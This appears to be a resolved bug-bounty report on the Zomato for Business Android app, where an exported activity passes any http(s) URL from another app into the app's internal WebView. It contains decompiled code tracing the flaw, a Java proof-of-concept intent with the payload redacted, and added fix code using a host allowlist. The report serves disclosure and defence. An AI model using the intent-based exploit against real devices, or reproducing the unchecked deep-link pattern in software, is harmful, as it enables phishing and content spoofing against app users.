[Zomato for Business Android] Vulnerability in exported activity WebView
Severity: Medium
Zomato
Reported by shell_c0de
Vulnerability Details
Hello, I want to report a vulnerability I found.
Since the activity `com.application.zomatomerchant.home.HomeSalt` has `exported="true"`, it can be exploited by another application.
### Application Information
Application: [Zomato for Business](https://play.google.com/store/apps/details?id=com.application.zomatomerchant)
Package Name: `com.application.zomatomerchant`
Version: `4.2.5`
Version Status: Latest
Vulnerable class: `com.application.zomatomerchant.deeplink.SaltDeepLinkRouterActivity`
### Vulnerability
Using a specially crafted intent, you can send a malicious URL to the class `com.application.zomatomerchant.ZWebView`.
```java
// Decompiled fragments (obfuscated names kept as-is). The path an attacker-supplied
// Uri takes from the exported activity to the WebView is marked with "put data".
public class HomeSalt extends PhiAppCompatActivityWithSimpleToolbar implements C0806a, C0928a {
    protected void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        if (this.f2062r == null) {
            this.f2062r = C0940a.m2184a(this);
        }
        mo7458b(R.layout.home_salt);
        mo7475d(R.string.app_name);
        this.f2061q = (Toolbar) findViewById(R.id.toolbar_simple_root);
        this.f2059o = (DrawerLayout) findViewById(R.id.drawer_layout);
        if (getIntent() != null) {
            // The intent data comes straight from the caller; any app can start this exported activity.
            Uri data = getIntent().getData();
            if (data != null && m2113a(data.toString())) {
                Bundle extras = getIntent().getExtras();
                if (extras == null || !extras.getBoolean("notification_popup", false)) {
                    mo10440c(data); // put data
    //...
    public void mo10440c(Uri uri) {
        if (!C0807b.f1729a.equals(uri)) {
            if (mo10218b(uri)) {
                mo10217a(uri);
            } else {
                // Forwarded to the deep-link router with the untrusted Uri unchanged.
                SaltDeepLinkRouterActivity.m1755a((Context) this, uri); // put data
    //...
    public static void m1755a(Context context, Uri uri) {
        Intent intent = new Intent(context, SaltDeepLinkRouterActivity.class);
        intent.setFlags(268435456); // FLAG_ACTIVITY_NEW_TASK
        intent.setData(uri);
        context.startActivity(intent);
    }
    //...
    // SaltDeepLinkRouterActivity
    protected void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        Intent intent = getIntent();
        if (!(intent == null || intent.getData() == null)) {
            Uri data = intent.getData();
            if (mo10218b(data)) {
                mo10217a(data); // put data
    //..
    public void mo10217a(Uri uri) {
        if (uri != null) {
            Intent intent;
            C0810e a = C0810e.m1769a((Activity) this);
            String host = uri.getHost(); // read, but never compared against an allowlist
            List pathSegments = uri.getPathSegments();
            int size = pathSegments != null ? pathSegments.size() : 0;
        } else if (!C2150af.m6783a(uri.getScheme()) && uri.getScheme().startsWith("http")) {
            // Any http(s) URL, whatever its host, is handed to the internal WebView.
            intent = new Intent(this, ZWebView.class); // load url
            intent.putExtra("open_external", true);
            intent.putExtra(NativeProtocol.IMAGE_URL_KEY, uri.toString()); // put data
```
Host check missing.
### PoC
Java PoC (run from any third-party app installed on the same device):
```java
// Explicitly target the exported activity and pass the attacker's URL as intent data.
Intent intent = new Intent("android.intent.action.VIEW");
intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_ACTIVITY_NEW_TASK);
intent.setClassName("com.application.zomatomerchant", "com.application.zomatomerchant.home.HomeSalt");
intent.setData(Uri.parse("███████/")); // redacted in the report
startActivity(intent);
```
Payload: ██████
### Fix
Check the host before loading the URL into the WebView.
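As an added example (not Zomato's code and not part of the original report), the following is one way to implement the suggested fix in the routing method that currently hands every `http`/`https` URL to `ZWebView`. The class name `DeepLinkGuard`, the method names and the allowlisted hosts are assumptions for illustration; the real allowlist must be the hosts the app actually serves. The check uses `android.net.Uri.getHost()`, which already strips any `user@` prefix, and compares the host exactly so that look-alike hosts such as `zomato.com.evil.com` are rejected.

```java
import android.content.ActivityNotFoundException;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/** Hypothetical guard for deep links before they reach the app's internal WebView. */
final class DeepLinkGuard {
    // Assumed allowlist for this example; replace with the app's own hosts.
    private static final Set<String> ALLOWED_HOSTS = new HashSet<>(Arrays.asList(
            "www.zomato.com",
            "zomato.com"));

    private DeepLinkGuard() {}

    /** True only for https URLs whose host is exactly on the allowlist. */
    static boolean isAllowedWebViewUrl(Uri uri) {
        if (uri == null || !uri.isHierarchical()) {
            return false; // opaque URIs (javascript:, mailto:, ...) never reach the WebView
        }
        String scheme = uri.getScheme();
        if (scheme == null || !scheme.equalsIgnoreCase("https")) {
            return false; // reject http, file:, content: and anything else
        }
        String host = uri.getHost();
        if (host == null || host.isEmpty()) {
            return false;
        }
        // getHost() drops userinfo, so "https://zomato.com@evil.com" yields "evil.com";
        // exact comparison rejects "zomato.com.evil.com" and similar prefix tricks.
        return ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    /** Replacement for the unchecked http branch of mo10217a(). */
    static void routeHttpUrl(Context context, Uri uri) {
        if (isAllowedWebViewUrl(uri)) {
            // Same intent the original code builds, now only for allowlisted hosts.
            Intent intent = new Intent(context, ZWebView.class);
            intent.putExtra("open_external", true);
            intent.putExtra(NativeProtocol.IMAGE_URL_KEY, uri.toString());
            context.startActivity(intent);
            return;
        }
        // Off-host http(s) links go to the system browser, never into the trusted WebView.
        String scheme = uri != null ? uri.getScheme() : null;
        if (scheme != null && (scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))) {
            try {
                context.startActivity(new Intent(Intent.ACTION_VIEW, uri));
            } catch (ActivityNotFoundException ignored) {
                // No browser installed; drop the link rather than fall back to the WebView.
            }
        }
        // Any other scheme is silently dropped.
    }
}
```

Because both `HomeSalt.onCreate()` and `SaltDeepLinkRouterActivity.onCreate()` end up in `mo10217a()`, the guard has to sit inside that method (or in front of the `ZWebView` intent), not in just one of the two entry points. The fix can be verified from a shell with `adb shell am start -a android.intent.action.VIEW -n com.application.zomatomerchant/.home.HomeSalt -d https://example.com/`, which should no longer open the page inside the app's WebView.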
## Impact
XSS / ability to open arbitrary sites in the application's internal WebView.
Allows replacing the application's content with a malicious website. The user will not be able to tell the difference.
The vulnerability is included in the [Google Play Security Reward Program](https://hackerone.com/googleplay) (section 2, Theft of insecure private data).
Report Details
State: Closed
Substate: Resolved